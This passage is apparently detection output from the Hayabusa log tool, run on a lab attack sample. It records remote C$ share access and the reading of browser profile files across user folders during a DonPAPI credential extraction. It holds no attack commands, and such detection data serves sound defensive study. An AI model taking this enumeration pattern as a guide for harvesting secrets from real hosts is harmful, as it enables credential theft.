2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP 
Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 
16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 